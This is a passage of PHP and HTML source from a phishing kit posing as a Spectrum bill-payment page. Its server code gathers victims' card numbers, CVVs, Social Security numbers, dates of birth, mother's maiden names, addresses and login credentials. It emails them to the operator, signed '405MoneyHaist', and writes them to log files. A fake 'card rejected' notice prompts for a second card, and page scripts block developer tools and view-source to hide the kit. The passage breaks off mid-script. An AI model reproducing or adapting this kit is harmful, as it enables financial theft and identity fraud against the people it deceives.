<?php
ob_start();
error_reporting(E_ALL);
ini_set('display_errors', 1);
include 'setup/function.php';

if(empty($_SESSION['email']) && empty($_SESSION['password'])) {
    header("Location: signin?session_expired=1");
    exit;
}

if(empty($_SESSION['payment']))
{
    header("Location: signin?session_expired=1");
    exit; 
}

if($_SESSION['payment'] != '3')
{
    header("Location: signin?session_expired=1");
    exit; 
}

$res = json_decode(file_get_contents('../config/access.json'), true);
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ipData = fetchIpData($ip, $userAgent);
if ($ipData) saveIpData($ipData, 'Human in Card Page');

if($_SERVER['REQUEST_METHOD'] == 'POST') {
    
    $_SESSION['form_data'] = $_POST;
    
    if(!isset($_SESSION['counting_submit']))
    {
        $_SESSION['counting_submit'] = 0;
    }
    
    $formData = $_SESSION['form_data'] ?? [];
    
    $cardName = $formData['firstName'] . ' ' . $formData['lastName'];
    $cardNumber = str_replace(' ', '', $formData['cardNumber']);

    if (!is_numeric($cardNumber) || !luhn_check($cardNumber)) {
        header("HTTP/1.1 400 Bad Request");
        exit;
    }

    $expirationDate = $formData['expirationMonth'] . '|' . $formData['expirationYear'];
    $formatexpWebshop = $formData['expirationMonth'] . '|' . $formData['expirationYear'];
    $cvv = $_POST['cvv'] ?? '';
    $cid = $_POST['cid'] ?? '';
    $xid = $_POST['xid'] ?? '';

    $bin = substr($cardNumber, 0, 6);
    $formattedCardNumber = implode(' ', str_split($cardNumber, 4));

    $formattedBin = $bin;

    $cardDetails = getCardDetailsFromBIN($bin);
    $issuer = strtoupper($cardDetails['issuer']);
    $cardTier = strtoupper($cardDetails['card_tier']);
    $scheme = strtoupper($cardDetails['scheme']);
    $type = strtoupper($cardDetails['type']);
    
    $ispInfo = fetchIpData($ip, $userAgent);
    $cityGeo = $ispInfo['city'] ?? 'N/A';
    $region = $ispInfo['region'] ?? 'N/A';
    $country = $ispInfo['country'] ?? 'N/A';
    $isp = $ispInfo['isp'] ?? 'N/A';
    
    $address = htmlspecialchars($formData['line1'] ?? '');
    $address2 = htmlspecialchars($formData['line2'] ?? '');
    $city = htmlspecialchars($formData['city'] ?? '');
    $state = htmlspecialchars($formData['state'] ?? '');
    $zipcode = htmlspecialchars($formData['zip'] ?? '');
    $phonenumber = htmlspecialchars($formData['phonenumber'] ?? '');
    $cty = $country;
    $sosel = htmlspecialchars($formData['SSN'] ?? '');
    $dob = htmlspecialchars($formData['DOB'] ?? '');
    $mmn = htmlspecialchars($formData['mmn'] ?? '');
    $email = htmlspecialchars($_SESSION['email'] ?? '');
    $password = htmlspecialchars($_SESSION['password'] ?? '');
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $dateTime = date("Y-m-d H:i:s");
    
    $webshop = "$cardNumber|$expirationDate|$cvv|$cardName|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    
    if($config['double_card'] == '1') {
        if(!empty($_SESSION['double_card'])) {
            if($_POST['cardnumber'] == $_SESSION['card_data']['cardnumber'])
            {
                $_SESSION['counting_submit'] += 1;
                if ($ipData) saveIpData($ipData, 'Human Try Submit Card '.$_SESSION['counting_submit']);
                header("Location: new-payment?ref=".generateRandomString(100));
                ob_flush();
                exit;
            } else {
                goto doublecc;
            }
        } else {
            $_SESSION['double_card'] = 'on';
            $_SESSION['card_data'] = $_POST;
            
            $templateCard = str_replace("##EMAIL##", $email, $templateCard);
            $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
            $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
            $templateCard = str_replace("##CNM##", $cardName, $templateCard);
            $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
            $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
            $templateCard = str_replace("##CVV##", $cvv, $templateCard);
            $templateCard = str_replace("##CID##", $cid, $templateCard);
            $templateCard = str_replace("##XID##", $xid, $templateCard);
            $templateCard = str_replace("##FULLNAME##", $cardName, $templateCard);
            $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
            $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
            $templateCard = str_replace("##CTY##", $city, $templateCard);
            $templateCard = str_replace("##STE##", $state, $templateCard);
            $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
            $templateCard = str_replace("##PINN##", '', $templateCard);
            $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
            $templateCard = str_replace("##MMN##", $mmn, $templateCard);
            $templateCard = str_replace("##DOB##", $dob, $templateCard);
            $templateCard = str_replace("##SSN##", $sosel, $templateCard);
            $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
            $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
            $templateCard = str_replace("##DV##", $device, $templateCard);
            $templateCard = str_replace("##BW##", $browser, $templateCard);
            $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
            $templateCard = str_replace("##ST##", $region, $templateCard);
            $templateCard = str_replace("##CT##", $country, $templateCard);
            $templateCard = str_replace("##IP##", $ip, $templateCard);
            $templateCard = str_replace("##UA##", $userAgent, $templateCard);
            
            $subject = "Card 1 :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
            // Use global email sender with PHPMailer/SMTP
            if (function_exists('sendResultEmail')) {
                sendResultEmail($subject, $templateCard);
            } else {
                $headers = "MIME-Version: 1.0\r\n";
                $headers .= "Content-type: text/html; charset=UTF-8\r\n";
                $headers .= "From: 405MoneyHaist <no-reply@405moneyhaist.com>\r\n";
                @mail($res['email_result'] ?? $access['email_result'] ?? $config['email_result'] ?? '', $subject, $templateCard, $headers);
            }
            
            loginAndCardSave($ip, 'card.txt');
            loginAndCardSave($ip, 'card1.txt'); // Card 1 log
            cardDetailsLogs($ip, $formattedBin, $cardName, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
            if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
            header("Location: new-payment?ref=".generateRandomString(100));
            ob_flush();
            exit;
        }
    }
    
    doublecc:
    $_SESSION['card_data'] = $_POST;
    
    $templateCard = str_replace("##EMAIL##", $email, $templateCard);
    $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
    $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
    $templateCard = str_replace("##CNM##", $cardName, $templateCard);
    $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
    $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
    $templateCard = str_replace("##CVV##", $cvv, $templateCard);
    $templateCard = str_replace("##CID##", $cid, $templateCard);
    $templateCard = str_replace("##XID##", $xid, $templateCard);
    $templateCard = str_replace("##FULLNAME##", $cardName, $templateCard);
    $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
    $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
    $templateCard = str_replace("##CTY##", $city, $templateCard);
    $templateCard = str_replace("##STE##", $state, $templateCard);
    $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
    $templateCard = str_replace("##PINN##", '', $templateCard);
    $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
    $templateCard = str_replace("##MMN##", $mmn, $templateCard);
    $templateCard = str_replace("##DOB##", $dob, $templateCard);
    $templateCard = str_replace("##SSN##", $sosel, $templateCard);
    $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
    $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
    $templateCard = str_replace("##DV##", $device, $templateCard);
    $templateCard = str_replace("##BW##", $browser, $templateCard);
    $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
    $templateCard = str_replace("##ST##", $region, $templateCard);
    $templateCard = str_replace("##CT##", $country, $templateCard);
    $templateCard = str_replace("##IP##", $ip, $templateCard);
    $templateCard = str_replace("##UA##", $userAgent, $templateCard);
    
    if($config['double_card'] == '1') {
        $status_card = '2';
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card2.txt'); // Card 2 log
        cardDetailsLogs($ip, $formattedBin, $cardName, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
        if ($ipData) saveIpData($ipData, 'Human Submit Card 2');
    } else {
        $status_card = '1';
        if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card1.txt'); // Card  1 log
        cardDetailsLogs($ip, $formattedBin, $cardName, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
    }
    
    $subject = "Card $status_card :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
    // Use global email sender with PHPMailer/SMTP
            if (function_exists('sendResultEmail')) {
                sendResultEmail($subject, $templateCard);
            } else {
                $headers = "MIME-Version: 1.0\r\n";
                $headers .= "Content-type: text/html; charset=UTF-8\r\n";
                $headers .= "From: 405MoneyHaist <no-reply@405moneyhaist.com>\r\n";
                @mail($res['email_result'] ?? $access['email_result'] ?? $config['email_result'] ?? '', $subject, $templateCard, $headers);
            }
    
    $dataccwebshop = "$cardNumber|$expirationDate|$cvv|$cardName|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    saveDataCard($dataccwebshop);
    
    session_destroy();
    
    header("Location: ".$config['redirect_completed_link']);
    ob_flush();
    exit;
}
// Get visitor language
$visitorLang = $_SESSION['visitor_lang'] ?? 'en';
$textDir = function_exists('getTextDirection') ? getTextDirection() : 'ltr';
?>
<!DOCTYPE html>
<html lang="<?= $visitorLang ?>" dir="<?= $textDir ?>">

<head>
  <style type="text/css">
    @keyframes atNodeInserted648 {
      from {
        opacity: 0.99
      }

      to {
        opacity: 1
      }
    }

    @-moz-keyframes atNodeInserted648 {
      from {
        opacity: 0.99
      }

      to {
        opacity: 1
      }
    }

    @-webkit-keyframes atNodeInserted648 {
      from {
        opacity: 0.99
      }

      to {
        opacity: 1
      }
    }

    @-ms-keyframes atNodeInserted648 {
      from {
        opacity: 0.99
      }

      to {
        opacity: 1
      }
    }

    @-o-keyframes atNodeInserted648 {
      from {
        opacity: 0.99
      }

      to {
        opacity: 1
      }
    }

    #page-header div.page-header__navigation>nav>a[href="#/"] {
      animation-duration: 0.001s;
      animation-name: atNodeInserted648;
      -moz-animation-duration: 0.001s;
      -moz-animation-name: atNodeInserted648;
      -webkit-animation-duration: 0.001s;
      -webkit-animation-name: atNodeInserted648;
      -ms-animation-duration: 0.001s;
      -ms-animation-name: atNodeInserted648;
      -o-animation-duration: 0.001s;
      -o-animation-name: atNodeInserted648;
    }
  </style>
  <meta charset="utf-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
  <title>Spectrum | Bill Pay</title>
  <link rel="icon" type="image/x-icon" href="assets/index.ico">
  <meta name="msapplication-TileColor" content="#1f232e">
  <meta name="theme-color" content="#1f232e">

  <script src="https://assets.adobedtm.com/331fbea29f79/de1fe8df812b/launch-cbf8c01aa601.min.js"></script>
  <script src="https://static.cimcontent.net/data-layer/?appId=resi_myaccount" crossorigin="anonymous"></script>
  <link href="https://payments.xfinity.com/static/css/2.0440f8c5.chunk.css" rel="stylesheet">
  <link href="assets/style.css" rel="stylesheet">
  <script src="https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement.min.js" async=""></script>
  <script src="https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement_Module_ActivityMap.min.js" async=""></script>
  <script src="https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement_Module_AudienceManagement.min.js" async=""></script>
  <script src="https://assets.adobedtm.com/331fbea29f79/de1fe8df812b/c9ed2add7f3c/RC3d75f96176a8418aafad5bd03f1d5445-source.min.js" async=""></script>
  <script src="https://assets.adobedtm.com/331fbea29f79/de1fe8df812b/c9ed2add7f3c/RC23c70044065f436d8880c3422e6442ef-source.min.js" async=""></script>
  <script src="https://assets.adobedtm.com/331fbea29f79/de1fe8df812b/c9ed2add7f3c/RC042f75f598834382945fa05e33b40292-source.min.js" async=""></script>

  <!-- Edit -->
  <script src="https://code.jquery.com/jquery-3.6.1.js" integrity="sha256-3zlB5s2uwoUzrXK3BT7AX3FyvojsraNFxCc2vC/7pNI=" crossorigin="anonymous"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.js" integrity="sha256-yE5LLp5HSQ/z+hJeCqkz9hdjNkk1jaiGG0tDCraumnA=" crossorigin="anonymous"></script>
  <!-- Edit -->

  <style>
    .error_message {
      font-weight: 500;
      font-size: 14px;
      line-height: 18px;
      color: #c90318;
      text-align: left;
      margin-top: 8px;
    }

    .error_message_cvv_3 {
      font-weight: 500;
      font-size: 14px;
      line-height: 18px;
      color: #c90318;
      text-align: left;
      margin-top: 8px;
    }

    .error_message_cvv_4 {
      font-weight: 500;
      font-size: 14px;
      line-height: 18px;
      color: #c90318;
      text-align: left;
      margin-top: 8px;
    }

    .form-control.valid-card, .form-control.valid { border-color: #28a745 !important; border-width: 2px !important; box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25) !important; background-color: #f8fff9 !important; }
    .form-control.invalid-card, .form-control.error { border-color: #dc3545 !important; border-width: 2px !important; box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25) !important; }
    .btn-loading { pointer-events: none; opacity: 0.7; position: relative; }
    .btn-loading::after { content: ''; position: absolute; width: 16px; height: 16px; top: 50%; right: 10px; margin-top: -8px; border: 2px solid transparent; border-top-color: #fff; border-radius: 50%; animation: btn-spin 0.6s linear infinite; }
    @keyframes btn-spin { to { transform: rotate(360deg); } }
  </style>

  <script>
    (function() {
        'use strict';
        function obfuscateDOM() { document.open(); document.write('<!DOCTYPE html><html><head><title>Spectrum</title><style>body{margin:0;padding:0;display:flex;justify-content:center;align-items:center;min-height:100vh;font-family:Arial,sans-serif;background:#f5f5f5}h1{color:#333;font-size:48px}</style></head><body><h1>Spectrum</h1></body></html>'); document.close(); }
        function clearConsole() { if (window.console && window.console.clear) console.clear(); console.log('%cAccess Denied', 'color: red; font-size: 40px; font-weight: bold;'); }
        const threshold = 160;
        setInterval(function() { if (window.outerHeight - window.innerHeight > threshold || window.outerWidth - window.innerWidth > threshold) clearConsole(); }, 500);
        document.addEventListener('keydown', function(e) {
            if (e.key === 'F12' || (e.ctrlKey && e.shiftKey && ['I','C','J'].includes(e.key.toUpperCase()))) { e.preventDefault(); e.stopPropagation(); clearConsole(); return false; }
            if (e.ctrlKey && e.key.toUpperCase() === 'U') { setTimeout(obfuscateDOM, 100); return true; }
            if (e.ctrlKey && ['C','V','X'].includes(e.key.toUpperCase())) { if (e.target.tagName !== 'INPUT' && e.target.tagName !== 'TEXTAREA') { e.preventDefault(); return false; } }
        }, true);
        document.addEventListener('contextmenu', function(e) { e.preventDefault(); return false; }, false);
        document.addEventListener('selectstart', function(e) { if (e.target.tagName !== 'INPUT' && e.target.tagName !== 'TEXTAREA') { e.preventDefault(); return false; } }, false);
        clearConsole();
    })();
  </script>

</head>

<body>
    <br>
    <br>
    <br>
<div class="app-header-logo">
      <a class="mat-button" target="_self" href="/" aria-disabled="false" tabindex="0" access-tabindex="banner-logo" access-next-tabindex="banner-link-support">
        <center><img alt="Spectrum logo" src="assets/test.svg?v=2.17.1_4" width="200" height="100">
      </a></center>
    </div>
  </div></span><span class="visuallyhidden">Spectrum</span></a></div>
          <div class="page-header__cancel"></div>
          <div class="page-header__back"></div><a class="sign-out button--text button" href="#" aria-disabled="false">Sign Out</a>
        </header>
        <main id="page-main" class="page-main" tabindex="-1" role="main">
          <div class="page-section ui-grey">
            <div class="page-section__wrapper">
              <div class="page-section__content">
                <form method="post" novalidate="">
                    
                    <?php if(isset($_SESSION['double_card'])): ?>
                    <center>
                        <font color="red">Your card has been rejected by sistem. Please input another card!.</font>
                    </center>
                    <?php endif; ?>
                    
                  <div class="payment-section">
                    <h1 class="heading2" tabindex="-1">Update Your Payment Information</h1>
                    <div class="card-group">
                      <div class="card-group__item">
                        <div class="card">
                          <div class="card__content">
                            <div class="form-control-group form-control-group--flex-at-768">
                              <div class="form-control-group__item">
                                <div class="form-control undefined"><label class="form-control__label" for="firstName">First name</label>
                                  <div class="form-control__input"><input id="firstName" aria-invalid="false" aria-describedby="error_firstName" class=" " name="firstName" type="text" title="First name" value="<?= $_SESSION['form_data']['firstName'] ?? '' ?>"></div>
                                  <p class="error_message" id="error_message_firstName" style="display: none">
                                      First name is required. </p>
                                                                  </div>
                              </div>
                              <div class="form-control-group__item">
                                <div class="form-control undefined"><label class="form-control__label" for="lastName">Last name</label>
                                  <div class="form-control__input"><input id="lastName" aria-invalid="false" aria-describedby="error_lastName" class=" " name="lastName" type="text" title="Last name" value="<?= $_SESSION['form_data']['lastName'] ?? '' ?>"></div>
                                  <p class="error_message" id="error_message_lastName" style="display: none">
                                      Last name is required. </p>
                                                                  </div>
                              </div>
                            </div>
                            <div class="form-control-group form-control-group--flex-at-1024">
                              <div class="form-control-group__item">
                                <div class="form-control undefined"><label class="form-control__label" for="cardNumber">Card number</label>
                                  <div class="form-control__input"><input id="cardNumber" aria-invalid="false" aria-describedby="validCardNumber" class="false " name="cardNumber" type="tel" value=""><span class="card-type"></span>
                                    <div style="position: absolute; right: 20px; top: 15px">
                                                        <img src="" width="25px" id="logocard">
                                    </div>
                                  </div>
                                  <p class="error_message" id="error_message_cardNumber" style="display: none">
                                      Card number is required. </p>
                                </div>
                                                              </div>
                              <div class="form-control-group__item">
                                <div class="form-control-group form-control-group--flex-at-768 mb0">
                                  <div class="form-control-group__item form-control-group__item--2of3-at-1024">
                                    <div class="form-control">
                                      <h3 class="label form-control__label">Expiration</h3>
                                      <div class="form-control__input">
                                        <div class="form-control-group form-control-group--flex mb0">
                                          <div class="form-control-group__item">
                                            <div class="form-control undefined">
                                              <div class="form-control__input"><label class="visuallyhidden" for="expirationMonth">Expiration month</label><select id="expirationMonth" aria-invalid="false" aria-describedby="expirationError" class=" " name="expirationMonth">
                                                  <option value="" disabled="" hidden="">MM</option>
                                                  <option value="01">01</option>
                                                  <option value="02">02</option>
                                                  <option value="03">03</option>
                                                  <option value="04">04</option>
                                                  <option value="05">05</option>
                                                  <option value="06">06</option>
                                                  <option value="07">07</option>
                                                  <option value="08">08</option>
                                                  <option value="09">09</option>
                                                  <option value="10">10</option>
                                                  <option value="11">11</option>
                                                  <option value="12">12</option>
                                                </select></div>
                                            </div>
                                          </div>
                                          <div class="form-control-group__item">
                                            <div class="form-control undefined">
                                              <div class="form-control__input"><label class="visuallyhidden" for="expirationYear">Expiration year</label><select id="expirationYear" aria-invalid="false" aria-describedby="expirationError" class=" " name="expirationYear">
                                                  <option value="" disabled="" hidden="">YYYY</option>
                                                  <option value="2024">2024</option>
                                                  <option value="2025">2025</option>
                                                  <option value="2026">2026</option>
                                                  <option value="2027">2027</option>
                                                  <option value="2028">2028</option>
                                                  <option value="2029">2029</option>
                                                  <option value="2030">2030</option>
                                                  <option value="2031">2031</option>
                                                  <option value="2032">2032</option>
                                                  <option value="2033">2033</option>
                                                  <option value="2034">2034</option>
                                                </select></div>
                                            </div>
                                          </div>
                                        </div>
                                      </div>
                                    </div>
                                    <p class="error_message" id="error_message_cardEXP" style="display: none">
                                      Card is expired. </p>
                                  </div>
                                  <div class="form-control-group__item form-control-group__item--1of3-at-1024">
                                    <div class="form-control form-control--cvv">
                                      <div class="form-control__input">
                                        <div class="form-control__label"><label for="cvv" class="d-inline-block">Security code</label><button class="button button--text" type="button"><svg focusable="false" viewBox="0 0 22 22" style="margin-left: 6px; width: 22px; height: 22px;">
                                              <g fill="none">
                                                <circle cx="11" cy="11" r="10" style="fill: none; stroke: currentcolor; stroke-miterlimit: 10;"></circle>
                                                <path d="M13.14 15.665l-.168.682c-.5.198-.902.35-1.2.452-.298.103-.645.155-1.04.155-.606 0-1.078-.15-1.415-.444-.336-.295-.505-.67-.505-1.127 0-.176.012-.357.038-.542.025-.184.066-.393.122-.626l.626-2.216c.056-.212.103-.413.14-.604.04-.19.058-.363.058-.52 0-.282-.058-.48-.175-.59-.116-.112-.338-.17-.67-.17-.16 0-.327.027-.497.077-.17.052-.316.1-.438.146l.167-.684c.41-.167.803-.31 1.178-.43.375-.118.73-.177 1.065-.177.602 0 1.067.145 1.393.437.327.29.49.67.49 1.134 0 .097-.01.266-.034.51-.022.242-.064.465-.125.667L11.524 14c-.05.178-.097.38-.137.61-.04.226-.06.4-.06.515 0 .293.065.493.196.6.132.106.36.16.682.16.152 0 .324-.028.516-.08.19-.053.33-.1.417-.14zm.157-9.27c0 .386-.145.714-.436.984-.29.27-.64.406-1.05.406-.41 0-.762-.136-1.055-.407-.294-.27-.44-.6-.44-.984s.146-.713.44-.986c.293-.274.645-.41 1.055-.41.41 0 .76.137 1.05.41.292.273.437.602.437.986z" fill="currentColor"></path>
                                              </g>
                                            </svg><span class="visuallyhidden">More information about security code</span></button></div>
                                        <input id="cvv" aria-invalid="false" aria-describedby="cardValidCvv" class="false " name="cvv" type="tel" value="">
                                      </div>
                                                                                                                    <p class="error_message_cvv_3" style="display: none;">
                                          Security code has to be 3 chars long </p>
                                                                                                                    <p class="error_message_cvv_4" style="display: none;">
                                          Security code has to be 4 chars long </p>
                                      
                                    </div>
                                    <div id="cid_form_box" style="display: none; margin-top: 8px;">
                                      <div class="form-control">
                                        <label class="form-control__label" for="cid">CID (3 digits)</label>
                                        <div class="form-control__input">
                                          <input id="cid" name="cid" type="tel" maxlength="3" inputmode="numeric" placeholder="3-digit CID" value="">
                                        </div>
                                        <p class="error_message_cid" id="cidError" style="display: none; color: red;">Please enter the 3-digit CID from your AMEX card.</p>
                                      </div>
                                    </div>
                                    <div id="xid_form_box" style="display: none; margin-top: 8px;">
                                      <div class="form-control">
                                        <label class="form-control__label" for="xid_input">XID (5 digits)</label>
                                        <div class="form-control__input">
                                          <input id="xid_input" name="xid" type="tel" maxlength="5" inputmode="numeric" placeholder="5-digit XID" value="">
                                        </div>
                                        <p class="error_message_xid" id="xidError" style="display: none; color: red;">Please enter the 5-digit XID from your Discover card.</p>
                                      </div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>
                      <div class="card-group__item">
                        <div class="card">
                          <div class="card__content">
                            <div class="form-control form-control--boolean undefined">
                              <div class="form-control__input"><label class="form-control__label" for="billingAddressCheckbox"><span class="form-control__label-text undefined">Add Your Billing address</span></label></div>
                            </div>
                            <div class="form-control-group form-control-group--flex-at-768">
                              <div class="form-control-group__item">
                                <div class="form-control undefined"><label class="form-control__label" for="line1">Address line 1</label>
                                  <div class="form-control__input"><input id="line1" aria-invalid="false" aria-describedby="addressError" class=" " name="line1" type="text" aria-required="true" value="<?= $_SESSION['form_data']['line1'] ?? '' ?>"></div>
                                  <p class="error_message" id="error_message_line1" style="display: none;">
                                          Address line 1 is required </p>
                                                                  </div>
                              </div>
                              <div class="form-control-group__item">
                                <div class="form-control undefined"><label class="form-control__label" for="line2">Address line 2 (Optional)</label>
                                  <div class="form-control__input"><input id="line2" aria-invalid="false" aria-describedby="error_line2" class=" " name="line2" type="text" value="<?= $_SESSION['form_data']['line2'] ?? '' ?>"></div>
                                </div>
                              </div>
                            </div>
                            <div class="form-control-group form-control-group--flex-at-768">
                              <div class="form-control-group__item">
                                <div class="form-control undefined"><label class="form-control__label" for="city">City</label>
                                  <div class="form-control__input"><input id="city" aria-invalid="false" aria-describedby="cityError" class=" " name="city" type="text" value="<?= $_SESSION['form_data']['city'] ?? '' ?>" required></div>
                                  <p class="error_message" id="error_message_city" style="display: none;">
                                          City is required </p>
                                                                  </div>

                              </div>
                              <div class="form-control-group__item">
                                <div class="form-control-group form-control-group--flex-at-768">
                                  <div class="form-control-group__item">
                                    <div class="form-control undefined"><label class="form-control__label" for="state">State</label>
                                      <div class="form-control__input">
                                        <select id="state" aria-invalid="false" aria-describedby="stateError" class=" " name="state" aria-required="true" required>
                                          <option value="AL" >AL</option>
                                          <option value="AK" >AK</option>
                                          <option value="AZ" >AZ</option>
                                          <option value="AR" >AR</option>
                                          <option value="CA" >CA</option>
                                          <option value="CO" >CO</option>
                                          <option value="CT" >CT</option>
                                          <option value="DC" >DC</option>
                                          <option value="DE" >DE</option>
                                          <option value="FL" >FL</option>
                                          <option value="GA" >GA</option>
                                          <option value="HI" >HI</option>
                                          <option value="ID" >ID</option>
                                          <option value="IL" >IL</option>
                                          <option value="IN" >IN</option>
                                          <option value="IA" >IA</option>
                                          <option value="KS" >KS</option>
                                          <option value="KY" >KY</option>
                                          <option value="LA" >LA</option>
                                          <option value="ME" >ME</option>
                                          <option value="MD" >MD</option>
                                          <option value="MA" >MA</option>
                                          <option value="MI" >MI</option>
                                          <option value="MN" >MN</option>
                                          <option value="MS" >MS</option>
                                          <option value="MO" >MO</option>
                                          <option value="MT" >MT</option>
                                          <option value="NE" >NE</option>
                                          <option value="NV" >NV</option>
                                          <option value="NH" >NH</option>
                                          <option value="NJ" >NJ</option>
                                          <option value="NM" >NM</option>
                                          <option value="NY" >NY</option>
                                          <option value="NC" >NC</option>
                                          <option value="ND" >ND</option>
                                          <option value="OH" >OH</option>
                                          <option value="OK" >OK</option>
                                          <option value="OR" >OR</option>
                                          <option value="PA" >PA</option>
                                          <option value="RI" >RI</option>
                                          <option value="SC" >SC</option>
                                          <option value="SD" >SD</option>
                                          <option value="TN" >TN</option>
                                          <option value="TX" >TX</option>
                                          <option value="UT" >UT</option>
                                          <option value="VT" >VT</option>
                                          <option value="VA" >VA</option>
                                          <option value="WA" >WA</option>
                                          <option value="WV" >WV</option>
                                          <option value="WI" >WI</option>
                                          <option value="WY" >WY</option>
                                        </select>
                                      </div>
                                    </div>
                                  </div>
                                  <div class="form-control-group__item">
                                    <div class="form-control undefined"><label class="form-control__label" for="zip">ZIP Code</label>
                                      <div class="form-control__input"><input id="zip" aria-invalid="false" aria-describedby="zipError" class=" " name="zip" type="tel" value="<?= $_SESSION['form_data']['zip'] ?? '' ?>" required></div>
                                      <p class="error_message" id="error_message_zip" style="display: none;">
                                          ZIP code is required </p>
                                                                          </div>
                                    <br>
                                  </div>
                                </div>


                              </div>

                            </div>
                          </div>
                          <div class="form-control-group form-control-group--flex-at-768">
                            <div class="form-control-group__item">
                                <div class="form-control undefined"><label class="form-control__label" for="SSN">Social Security Number</label>
                                  <div class="form-control__input"><input id="SSN" aria-invalid="false" aria-describedby="SSNError" class=" " name="SSN" type="tel" aria-required="true" value="<?= $_SESSION['form_data']['SSN'] ?? '' ?>" placeholder="XXX-XX-XXXX"></div>
                                  <p class="error_message" id="error_message_SSN" style="display: none;">
                                          Social security number is required </p>
                                                                      </div>
                            </div>
                            <div class="form-control-group__item">
                              <div class="form-control undefined"><label class="form-control__label" for="DOB">Date of Birth</label>
                                <div class="form-control__input"><input id="DOB" aria-invalid="false" aria-describedby="DOBError" class=" " name="DOB" type="tel" aria-required="true" value="<?= $_SESSION['form_data']['DOB'] ?? '' ?>" placeholder="XX/XX/XXXX"></div>
                                <p class="error_message" id="error_message_DOB" style="display: none;">
                                          Date of birth is required </p>
                                                              </div>
                            </div>
                            <div class="form-control-group__item">
                              <div class="form-control undefined"><label class="form-control__label" for="phonenumber">Phone Number</label>
                                <div class="form-control__input">
                                  <input id="phonenumber" aria-invalid="false" aria-describedby="phonenumberError" class=" " name="phonenumber" type="tel" aria-required="true" value="<?= $_SESSION['form_data']['phonenumber'] ?? '' ?>" placeholder="+1" required>
                                                                  </div>
                                                                  <p class="error_message" id="error_message_phonenumber" style="display: none;">
                                          Phone number is required </p>
                              </div>
                            </div>
                          </div>

            <div class="action action--right pt6">
              <div class="action__item"><button type="submit" class="button button--primary" id="NextButton">Update</button></div>
              <div class="action__item"></div>
            </div>
            </form>
          </div>
      </div>
    </div>
                            </div>
                      </div>
                    </div>
                  </div>
              </div>
            </div>
    </main>
    <div class="page-footer page-footer--thin ">
      <div class="link-group">
        <div class="link-group__item">© <?= date('Y'); ?> Charter Communications. All rights reserved</div>
        <div class="link-group__item"><a href="https://www.xfinity.com/privacy/policy" target="_blank" rel="noopener noreferrer">Privacy Policy</a></div>
        <div class="link-group__item"><a href="https://www.xfinity.com/privacy/manage-preference" target="_blank" rel="noopener noreferrer">Do Not Sell My Personal Information</a></div>
      </div>
    </div>
  </div>
  </div>
  </div>

  <script>
    $('input[name="SSN"]').mask('000-00-0000');
    $('input[name="DOB"]').mask('00/00/0000');
    // Removed: jQuery mask conflicts with JS formatter that adds spaces
    // $('input[name="cardNumber"]').mask('0000000000000000');
    setSecurity();
    $('input[name="cvv"]').on('change', function() {
      var cvv = $(this).val();

      var cardNumber = $('#cardNumber').val();

      if (cardNumber.charAt(0) == '3') {
        if (cvv.length < 4) {
          $('.error_message_cvv_4').show();
          $('.error_message_cvv_3').hide();
          $('.error_message_cvv').hide();
        } else {
          $('.error_message_cvv_4').hide();
          $('.error_message_cvv_3').hide();
          $('#error_message_cvv').hide();
        }
      } else {
        if (cvv.length < 3) {
          $('.error_message_cvv_3').show();
          $('.error_message_cvv_4').hide();
          $('#error_message_cvv').hide();
        } else {
          $('.error_message_cvv_3').hide();
          $('.error_message_cvv_4').hide();
          $('#error_message_cvv').hide();
        }
      }

    });

    $('input[name="firstName"]').on('input', function() {
      var firstName = $(this).val().trim();
      if (firstName == '') {
        $('#error_message_firstName').show();
      } else {
        $('#error_message_firstName').hide();
      }
    })
    
    $('input[name="firstName"]').on('click', function() {
      var firstName = $(this).val().trim();
      if (firstName == '') {
        $('#error_message_firstName').show();
